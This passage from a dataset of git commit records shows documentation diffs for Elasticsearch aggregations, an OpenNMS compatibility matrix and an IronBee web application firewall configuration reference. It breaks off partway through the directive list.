`extended_stats` metric will return an object called `std_deviation_bounds`, which provides an interval of plus\/minus two standard\ndeviations from the mean. This can be a useful way to visualize variance of your data. If you want a different boundary, for example\nthree standard deviations, you can set `sigma` in the request:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"grades_stats\" : {\n \"extended_stats\" : {\n \"field\" : \"grade\",\n \"sigma\" : 3 <1>\n }\n }\n }\n}\n--------------------------------------------------\n<1> `sigma` controls how many standard deviations +\/- from the mean should be displayed coming[1.4.3]\n\n`sigma` can be any non-negative double, meaning you can request non-integer values such as `1.5`. A value of `0` is valid, but will simply\nreturn the average for both `upper` and `lower` bounds.\n\n.Standard Deviation and Bounds require normality\n[NOTE]\n=====\nThe standard deviation and its bounds are displayed by default, but they are not always applicable to all data-sets. Your data must\nbe normally distributed for the metrics to make sense. The statistics behind standard deviations assumes normally distributed data, so\nif your data is skewed heavily left or right, the value returned will be misleading.\n=====\n\n==== Script\n\nComputing the grades stats based on a script:\n\n[source,js]\n--------------------------------------------------\n{\n ...,\n\n \"aggs\" : {\n \"grades_stats\" : { \"extended_stats\" : { \"script\" : \"doc['grade'].value\" } }\n }\n}\n--------------------------------------------------\n\n===== Value Script\n\nIt turned out that the exam was way above the level of the students and a grade correction needs to be applied. We can use value script to get the new stats:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n ...\n\n \"aggs\" : {\n \"grades_stats\" : {\n \"extended_stats\" : {\n \"field\" : \"grade\",\n \"script\" : \"_value * correction\",\n \"params\" : {\n \"correction\" : 1.2\n }\n }\n }\n }\n }\n}\n--------------------------------------------------","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f2193fd96957959d4a29c6671b0d02cd542df188","subject":"Fix GeoDistance query example","message":"Fix GeoDistance query example\n\nCherry pick #28355 in 6.2 branch\n","repos":"vroyer\/elasticassandra,vroyer\/elasticassandra,vroyer\/elasticassandra","old_file":"docs\/java-api\/query-dsl\/geo-distance-query.asciidoc","new_file":"docs\/java-api\/query-dsl\/geo-distance-query.asciidoc","new_contents":"[[java-query-dsl-geo-distance-query]]\n==== Geo Distance Query\n\nSee {ref}\/query-dsl-geo-distance-query.html[Geo Distance Query]\n\n[\"source\",\"java\",subs=\"attributes,callouts,macros\"]\n--------------------------------------------------\ninclude-tagged::{query-dsl-test}[geo_distance]\n--------------------------------------------------\n<1> field\n<2> center point\n<3> distance from center point\n","old_contents":"[[java-query-dsl-geo-distance-query]]\n==== Geo Distance Query\n\nSee {ref}\/query-dsl-geo-distance-query.html[Geo Distance Query]\n\n[\"source\",\"java\",subs=\"attributes,callouts,macros\"]\n--------------------------------------------------\ninclude-tagged::{query-dsl-test}[geo_bounding_box]\n--------------------------------------------------\n<1> field\n<2> center point\n<3> distance from center point\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1624f0066ddc317812662a09c7667e17a7efd970","subject":"[bamboo] Automated branch merge (from foundation-2017:f6e3fe0e3e3aa36b3295b3177326ce7fc5c5c60b)","message":"[bamboo] Automated branch merge (from foundation-2017:f6e3fe0e3e3aa36b3295b3177326ce7fc5c5c60b)\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/opennms\/compatibility-matrix.adoc","new_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/opennms\/compatibility-matrix.adoc","new_contents":"[[compatibility_matrix]]\n== Compatibility Matrix\n\n[options=\"header, autowidth\"]\n|===\n| OpenNMS | Java | PostgreSQL | Newts | Cassandra | Grafana | Elasticsearch | Kafka\n| Horizon 19 | 8 | 9.2+ | [green]*Yes* | [green]*1.2, 2.X, 3.0* | [green]*3.X, 4.X* | [green]*2.X, 5.X* | [green]*0.10*\n| Horizon 18 | 8 | 9.1+ | [green]*Yes* | [green]*1.2, 2.X, 3.0* | [green]*3.X, 4.X* | [green]*1.0* | [red]#No#\n| Meridian 2016 | 8 | 9.1+ | [green]*Yes* | [green]*1.2, 2.X, 3.0* | [green]*3.X, 4.X* | [red]#No# | [red]#No#\n| Horizon 17 | 8 | 9.1+ | [green]*Yes* | [green]*1.2, 2.X* | [green]*3.X, 4.X* | [red]#No# | [red]#No#\n| Horizon 16 | 8 | 9.0+ | [red]#No# | [red]#No# | [green]*3.X, 4.X* | [red]#No# | [red]#No#\n| Horizon 15 | 7 | 9.0+ | [red]#No# | [red]#No# | [red]#No# | [red]#No# | [red]#No#\n| Meridian 2015 | 7 | 9.0+ | [red]#No# | [red]#No# | [red]#No# | [red]#No# | [red]#No#\n|===\n","old_contents":"[[compatibility_matrix]]\n== Compatibility Matrix\n\n[options=\"header, autowidth\"]\n|===\n| OpenNMS | Java | PostgreSQL | Newts | Cassandra | Grafana | Elasticsearch | Kafka\n| Horizon 19 | 8 | 9.2+ | [green]*Yes* | [green]*1.2,2.X,3.0* | [green]*3.X, 4.X* | [green]*2.X, 5.X* | [green]*0.10*\n| Horizon 18 | 8 | 9.1+ | [green]*Yes* | [green]*1.2,2.X,3.0* | [green]*3.X, 4.X* | [green]*1.0* | [red]#No#\n| Meridian 2016 | 8 | 9.1+ | [green]*Yes* | [green]*1.2,2.X,3.0* | [green]*3.X, 4.X* | [red]#No# | [red]#No#\n| Horizon 17 | 8 | 9.1+ | [green]*Yes* | [green]*1.2,2.X* | [green]*3.X, 4.X* | [red]#No# | [red]#No#\n| Horizon 16 | 8 | 9.0+ | [red]#No# | [red]#No# | [green]*3.X, 4.X* | [red]#No# | [red]#No#\n| Horizon 15 | 7 | 9.0+ | [red]#No# | [red]#No# | [red]#No# | [red]#No# | [red]#No#\n| Meridian 2015 | 7 | 9.0+ | [red]#No# | [red]#No# | [red]#No# | [red]#No# | [red]#No#\n|===\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"2e636c6cfcf1905457988ccf4fb4ab9fdc38b7d3","subject":"docs: Add missing expire option to PersistenceMap directive.","message":"docs: Add missing expire option to PersistenceMap directive.","repos":"b1v1r\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee","old_file":"docs\/reference-manual\/ch-ironbee-configuration.adoc","new_file":"docs\/reference-manual\/ch-ironbee-configuration.adoc","new_contents":"IronBee Configuration\n---------------------\n\nThe IronBee configuration is loaded from the server container.\nThe syntax is similar to the Apache httpd server configuration.\nThe following rules apply:\n\n* Escape sequences are as in JavaScript (section 7.8.4 in ECMA-262),\nexcept within PCRE regular expression patterns, where PCRE escaping is\nused\n* Lines that begin with `#` are comments\n* Lines are continued on the next line when `\\` is the last character on\na line\n\nThe IronBee configuration defines general configuration as well as site\nand location mappings, which can each have their own configuration.\n\n-----------------------------------------------\n# Main Configuration\nSensorId 13AABA8F-2575-4F93-83BF-C87C1E8EECCE\n...\n\n# Site1\n<Site site1>\n SiteId 0B781B90-CE3B-470C-952C-5F2878EFFC05\n Hostname site1.example.com\n Service 10.0.1.100:80\n\n ...\n\n <Location \/directory1>\n ...\n <\/Location>\n<\/Site>\n\n# Site2\n<Site site2>\n SiteId 8B3BA3DE-2727-4737-9230-4A1D110E6C87\n Hostname site2.example.com\n Service 10.0.5.100:80\n\n ...\n<\/Site>\n\n# Default Site\n<Site default>\n SiteId F89E43B3-EB96-44F0-BE1C-B4673B96DF9C\n Hostname *\n Service *:*\n\n ...\n<\/Site>\n-----------------------------------------------\n\nThe following is a reference for all IronBee directives where the\ncontext refers to the possible locations within the configuration file.\n\n=== Action\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads a rule that will always execute its actions and, in most contexts, enable the rule for execution in that context.\n| Syntax|`Action id:1234 rev:1 phase:THE_PHASE ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nThis is shorthand and functionally equivilant to a rule with no targets\nand an operator that always returns true. Internally this is represented as\nfollows.\n\n-----------------------------------------------\n# These are equivilents\nRule NULL @nop \"\" ...\nAction ...\n-----------------------------------------------\n\n[NOTE]\nLoading a rule will, in most contexts, also enable the rule to be\nexecuted in that context. However, the main configuration context is\nspecial. Loading a rule in the main configuration context will _NOT_\nenable the rule, but just load it into memory so that it can be shared\nby other contexts. You must explicitly use `RuleEnable` in another\ncontext to enable the rule.\n\n=== AuditEngine\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the audit log engine.\n| Syntax|`AuditEngine On \\| Off \\| RelevantOnly`\n| Default|`RelevantOnly`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.3\n|===============================================================================\n\nSetting `AuditEngine` to `RelevantOnly`, the default, does not log any\ntransactions in itself. Instead, further activity (e.g., a rule match)\nis required for a transaction to be recorded. Setting `AuditEngine` to\n`On` activates audit logging for *all transactions*, which may cause a\nlarge amount of data to be logged.\n\n=== AuditLogBaseDir\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the directory where individual audit log entries will be stored. This also serves as the base directory for `AuditLogIndex` if it uses a relative path.\n| Syntax|`AuditLogBaseDir <path>`\n| Default|`\"\/var\/log\/ironbee\"`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.3\n|===============================================================================\n\n=== AuditLogDirMode\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the directory mode that will be used for new directories created during audit logging.\n| Syntax|`AuditLogDirMode <octal-mode>`\n| Default|`0700`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== AuditLogFileMode\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the file mode that will be used when creatingindividual audit log files.\n| Syntax|`AuditLogFileMode <octal-mode>`\n| Default|`0600`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\n=== AuditLogIndex\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the audit log index file.\n| Syntax|`AuditLogIndex None\\|<location>`\n| Default|`ironbee-index.log`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nRelative filenames are based off the `AuditLogBaseDir` directory and\nspecifying `None` disables the index file entirely.\n\n=== AuditLogIndexFormat\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the format of the entries logged in the auditlog index file.\n| Syntax|`AuditLogIndexFormat <format>`\n| Default|`%T %h %a %S %s %t %f`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n* *%%* The percent sign\n* *%a* Remote IP-address\n* *%A* Local IP-address\n* *%h* HTTP Hostname\n* *%s* Site ID\n* *%S* Sensor ID\n* *%t* Transaction ID\n* *%T* Transaction timestamp (YYYY-MM-DDTHH:MM:SS.ssss+\/-ZZZZ)\n* *%f* Audit log filename (relative to `AuditLogBaseDir`)\n\n=== AuditLogParts\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures which parts will be logged to the audit log.\n| Syntax|`AuditLogPart <options>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nAn audit log consist of many parts; `AuditLogParts` determines which\nparts are recorded by default. The parts are inherited into child\ncontexts (Site, Location, etc). Specifying a part with +\/- operator will\nadd or remove the given part from the current set of parts. Specifying\nthe first option without +\/- operators will cause all options to be\noverridden and the list of options will be the only options set. Here is\nwhat your configuration might look like:\n\n-------------------------------------------------------------------\nAuditLogParts minimal +request -requestBody +response -responseBody\n-------------------------------------------------------------------\n\nThe above first resets the list of parts to *minimal*, adds all the\n*request* parts except the *requestBody*, then adds all the *response*\nparts except the *responseBody*.\n\nLater, in a sub-context, you may wish to enable response body logging\nand thus can just specify this part with the + operator:\n\n----------------------\n<Location \/some\/path>\n AuditLogParts \n<\/Location>\n----------------------\n\nIf you already had response body logging enabled, but didn't want it any\nmore, you would write:\n\n----------------------\n<Location \/some\/path>\n AuditLogParts \n<\/Location>\n----------------------\n\nAudit Log Part Names:\n\n* *header:* Audit Log header (required)\n* *events:* List of events that triggered\n* *requestMetadata:* Information about the request\n* *requestHeaders:* Raw request headers\n* *requestBody:* Raw request body\n* *requestTrailers:* Raw request trailers\n* *responseMetadata:* Information about the response\n* *responseHeaders:* Raw response headers\n* *responseBody:* Raw response body\n* *responseTrailers:* Raw response trailers\n* *debugFields:* Currently not implemented\n\nAudit Log Part Group Names:\n\nThese are just aliases for multiple parts.\n\n* *none:* Removes all parts\n* *minimal:* Minimal parts (currently *header* and *events* parts)\n* *default:* Default parts (currently *minimal* and request\/response\nparts without bodies)\n* *request:* All request related parts\n* *response:* All response related parts\n* *debug:* All debug related parts\n* *all:* All parts\n\n=== AuditLogSubDirFormat\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the directory structure created under the `AuditLogBaseDir` directory. This is a +strftime(3)+ format string allowing the directory structure to be created based on date\/time.\n| Syntax|`AuditLogSubDirFormat <format>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== AuthBasicRealm\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the Basic Auth Realm used to challenge a user.\n| Syntax|`AuthBasicRealm <realm-string>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident_authbasic\n| Version|0.8\n|===============================================================================\n\n=== BlockingMethod\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the default blocking method.\n| Syntax|`BlockingMethod status=<code> \\| close`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.8\n|===============================================================================\n\n=== DefaultBlockStatus\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the default HTTP status code used for blocking.\n| Syntax|`DefaultBlockStatus`\n| Default|`403`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== ErrorPageMap\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the error page contents for a given status code.\n| Syntax|`ErrorPageMap <http-status-code> <file>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|error_page\n| Version|0.9\n|===============================================================================\n\nWhen an error page is generated (blocked), the status code is mapped to a file to\ndeliver as the body.\n\n=== FastAutomata\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads the automata for \"fast\" rules.\n| Syntax|`FastAutomata <automata-file>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|error_page\n| Version|0.9\n|===============================================================================\n\n=== GeoIPDatabaseFile\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the geoip database file.\n| Syntax|`GeoIPDatabaseFile <geoip-db-file>`\n| Default|`\/usr\/share\/geoip\/GeoLiteCity.dat`\n| Context|Any\n|Cardinality|0..1\n| Module|geoip\n| Version|0.4\n|===============================================================================\n\n=== Hostname\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Maps hostnames to a Site.\n| Syntax|`Hostname <hostname>`\n| Default|`*` (any)\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThe `Hostname` directive establishes a mapping between a Site and one or\nmore hostnames. To map IP\/Port pairs to a Site, see the `Service`\ndirective.\n\nIn the simplest case, a site will occupy a single hostname:\n\n------------------------\nHostname www.ironbee.com\n------------------------\n\nMore often than not, however, several names will be used:\n\n------------------------\nHostname www.ironbee.com\nHostname ironbee.com\n------------------------\n\nWildcards are permitted when there are multiple names under a common\ndomain. Only one wildcard character per hostname is allowed and it must\ncurrently be on the left-hand side:\n\n----------------------\nHostname ironbee.com\nHostname *.ironbee.com\n----------------------\n\nFinally, to match any hostname (which you will need to do in default\nsites), use a single asterisk, which is the default if no `Hostname`\ndirective is specified for a site:\n\n----------\nHostname *\n----------\n\n=== IdentMode\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configure the ident mode.\n| Syntax|`IdentMode <mode>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident\n| Version|0.8\n|===============================================================================\n\n=== IdentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configure the ident type.\n| Syntax|`IdentType <type>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident\n| Version|0.8\n|===============================================================================\n\n=== Include\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Includes external file into configuration.\n| Syntax|`Include`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.5\n|===============================================================================\n\nAllows inclusion of another file into the current configuration file.\nThe following line will include the contents of the file `sites.conf`\ninto configuration:\n\n-----------------------\nInclude conf\/sites.conf\n-----------------------\n\nThe file must exist and be accessible or an error is generated (use\n`IncludeIfExists` if this is not the case). If you specify a relative\npath, the location of the configuration file containing this directive\nwill be used to resolve it.\n\n=== IncludeIfExists\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Includes external file into configuration if it exists and is accessible.\n| Syntax|`IncludeIfExists`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.7\n|===============================================================================\n\nAs `Include`, but allows for optional inclusion without causing a\nconfiguration error if the file does not exist (as would the `Include`\ndirective).\n\n=== InitCollection\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Initializes a locally scoped collection data field for later use and optional persistence.\n| Syntax|`InitCollection <uri> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|initcollection, persist\n| Version|0.7\n|===============================================================================\n\nInitializes a collection from the initializer. The initializer format\ndepends on the implementation. There are multiple URI formats supported,\nwhich are described below.\n\nCore Functionality\n^^^^^^^^^^^^^^^^^^\n\n`vars: key1=val1 key2=val2 ... keyN=valN`\n\nThe `vars` URI allows initializing a collection of simple key\/value\npairs.\n\n----------------------------------------------------\nInitCollection MY_VARS vars: key1=value1 key2=value2\n----------------------------------------------------\n\n`json-file:\/\/\/path\/file.json [persist]`\n\nThe json-file URI allows loading a more complex collection from a JSON\nformatted file. If the optional persist parameter is specified, then\nanything changed is persisted back to the file at the end of the\ntransaction. Next time the collection is initialized, it will be from\nthe persisted data.\n\n-----------------------------------------------------------------------------------------------\nInitCollection MY_JSON_COLLECTION json-file:\/\/\/tmp\/ironbee\/persist\/test1.json\nInitCollection MY_PERSISTED_JSON_COLLECTION json-file:\/\/\/tmp\/ironbee\/persist\/test2.json persist\n-----------------------------------------------------------------------------------------------\n\n=== InitVar\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Initializes a locally scoped variable data field for later use.\n| Syntax|`InitVar <name> <value>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\n=== InspectionEngineOptions\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures options for the inspection engine.\n| Syntax|`InspectionEngineOptions <options>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.7\n|===============================================================================\n\nThe inspection engine allows setting options; `InspectionEngineOptions`\ncontrols these options. The options are inherited into child contexts\n(Site, Location, etc). Specifying an option with +\/- operator will add\nor remove the given option from the current set. Specifying the first\noption without +\/- operators will cause all options to be overridden and\nthe list of options will be the only options set. Here is what your\nconfiguration might look like:\n\n-------------------------------------\nInspectionEngineOptions all -response\n-------------------------------------\n\nThe above first resets the inspection to *all*, then removes the\n*response* from being inspected.\n\nLater, in a sub-context, you may wish to enable response response\ninspection and thus can just specify this part with the + operator:\n\n-------------------------------------\n<Location \/some\/path>\n InspectionEngineOptions +response\n<\/Location>\n-------------------------------------\n\nIf you already had response enabled, but did not want it enabled, you\nwould write:\n\n-------------------------------------\n<Location \/some\/other\/path>\n InspectionEngineOptions -response\n<\/Location>\n-------------------------------------\n\nInspection Engine Options::\n* *requestHeader:* Inspect the HTTP request header (default)\n* *requestBody:* Inspect the HTTP request body\n* *responseHeader:* Inspect the HTTP response header\n* *responseBody:* Inspect the HTTP response body\n\nInspection Engine Option Group Names::\n* *none:* Removes all options\n* *default:* Default options (currently request header only)\n* *request:* All request related options\n* *response:* All response related options\n* *all:* All options\n\n=== LoadEudoxus\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads an external Eudoxus Automata into IronBee.\n| Syntax|`LoadEudoxus <name> <automata-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|ee\n| Version|0.7\n|===============================================================================\n\nThis directive will load an external eudoxus automata from `file` into\nthe engine with the given `name`. Once loaded, the automata can then be\nused with the associated eudoxus rule operators such as the\n`ee_match_any` operator.\n\nThe eudoxus automata is a precompiled and optimized automata generated\nby the ac_generator and ec commands in the `automata\/bin` directory.\nCurrently, as of IronBee 0.7, a modified Aho-Corasick algorithm is\nimplemented which can handle very large external dictionaries. Refer to\nthe\nhttps:\/\/www.ironbee.com\/docs\/devexternal\/ironautomata.html[IronAutomata\nDocumentation] for more information.\n\n=== LoadModule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads an external module into configuration.\n| Syntax|`LoadModule <module-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis directive will add an external module to the engine, potentially\nmaking new directives available to the configuration.\n\n=== Location\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a subcontext that can have a differentconfiguration.\n| Syntax|`<Location path>...<\/Location>`\n| Default|None\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nA sub-context created by this directive initially has identical\nconfiguration to that of the site it belongs to. Further directives are\nrequired to introduce changes. Locations are evaluated in the order in\nwhich they appear in the configuration file. The first location that\nmatches request path will be used. This means that you should put the\nmost-specific location first, followed by the less specific ones.\n\n---------------------------------------\nInclude rules.conf\n\n<Site site1>\n Service *:80\n Service 10.0.1.2:443\n Hostname site1.example.com\n\n <Location \/prefix\/app1>\n RuleEnable all\n <\/Location>\n\n <Location \/prefix>\n RuleEnable tag:GenericRules\n <\/Location>\n<\/Site>\n---------------------------------------\n\n=== Log\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the log file.\n| Syntax|`Log <location>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== LogLevel\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the detail level of the entries recorded tothe log.\n| Syntax|`LogLevel <level>`\n| Default|`warning`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThe following log levels are supported (either numeric or text)::\n* * 0 - emergency* - system unusable\n* * 1 - alert* - crisis happened\n* * 2 - critical* - crisis coming\n* * 3 - error* - error occurred\n* * 4 - warning* - error likely to occur\n* * 5 - notice* - something unusual happened\n* * 6 - info* - informational messages\n* * 7 - debug* - debugging: transaction state changes\n* * 8 - debug2* - debugging: log of activities carried out\n* * 9 - debug3* - debugging: activities, with more detail\n* *10 - trace* - debugging: developer log messages\n\n=== LuaLoadModule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Load a Lua module (similar to LoadModule).\n| Syntax|`LuaLoadModule <lua-module-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n--------------------------------\nLuaLoadModule \"threat_level.lua\"\n--------------------------------\n\n=== LuaInclude\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Execute a Lua script as a configuration file.\n| Syntax|`LuaInclude <lua-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n----------------------\nLuaInclude \"rules.lua\"\n----------------------\n\n=== LuaPackageCPath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the Lua C package path.\n| Syntax|`LuaPackageCPath <lua-cpath>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n=== LuaPackagePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the Lua package path.\n| Syntax|`LuaPackageCPath <lua-cpath>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n=== LuaSet\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Set a named configuration parameter in a lua module.\n| Syntax|`LuaSet <lua-module-name> <name> <value>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n----------------------------------------------\nLuaLoadModule \"my-lua-module.lua\"\n...\nLuaSet \"my-lua-module.lua\" MY_VAR \"some value\"\n----------------------------------------------\n\n=== ModuleBasePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the base path where IronBee modules are loaded.\n| Syntax|`ModuleBasePath`\n| Default|The `libexec` directory under the IronBee install prefix.\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== PcreDfaWorkspaceSize\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE DFA workspace size.\n| Syntax|`PcreDfaWorkspaceSize <size>`\n| Default|200\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreJitStackMax\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE stack maximum size.\n| Syntax|`PcreJitStackMax <size>`\n| Default|0 (auto)\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreJitStackStart\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE stack starting size.\n| Syntax|`PcreJitStackStart <size>`\n| Default|0 (auto)\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreMatchLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library match limit.\n| Syntax|`PcreMatchLimit`\n| Default|5000\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\nFrom the `pcreapi` manual: ``The match_limit field provides a means of\npreventing PCRE from using up a vast amount of resources when running\npatterns that are not going to match, but which have a very large number\nof possibilities in their search trees. The classic example is a pattern\nthat uses nested unlimited repeats.''\n\n=== PcreMatchLimitRecursion\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library match limit recursion.\n| Syntax|`PcreMatchLimitRecursion`\n| Default|5000\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\nFrom the `pcreapi` manual: ``The match_limit_recursion field is similar\nto match_limit, but instead of limiting the total number of times that\nmatch() is called, it limits the depth of recursion. The recursion depth\nis a smaller number than the total number of calls, because not all\ncalls to match() are recursive. This limit is of use only if it is set\nsmaller than match_limit.''\n\n=== PcreStudy\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE \"study\" option.\n| Syntax|`PcreStudy On \\| Off`\n| Default|On\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreUseJit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library to use the JIT.\n| Syntax|`PcreUseJit On \\| Off`\n| Default|On\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PersistenceMap\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Map a collection to a persistence store.\n| Syntax|`PersistenceMap <collection> <store> [key=value] [expire=value]`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|persistence_framework, persist\n| Version|0.7\n|===============================================================================\n\nSee: <<_persisting_collections>>\n\n=== PersistenceStore\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a persistence store.\n| Syntax|`PersistenceStore <name> <uri>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|persistence_framework, persist\n| Version|0.7\n|===============================================================================\n\nSee: <<_persisting_collections>>\n\n=== PredicateAssertValid\n|===============================================================================\n|Description|Validate predicate, write a predicate report to file or stderr and abort on error.\n| Syntax|`PredicateAssertValid <file> \\| \"\"`\n| Default|\"\" (stderr)\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.8\n|===============================================================================\n\n=== PredicateDebugReport\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Write a predicate debug report to file or stderr.\n| Syntax|`PredicateDebugReport <file> \\| \"\"`\n| Default|\"\" (stderr)\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.8\n|===============================================================================\n\n=== PredicateDefine\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a predicate template.\n| Syntax|`PredicateDefine ...`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.9\n|===============================================================================\n\n=== PredicateTrace\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable predicate trace output to file or stderr.\n| Syntax|`PredicateTrace <file> \\| \"\"`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.9\n|===============================================================================\n\n=== ProtectionEngineOptions\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures options for the protection engine.\n| Syntax|`ProtectionEngineOptions 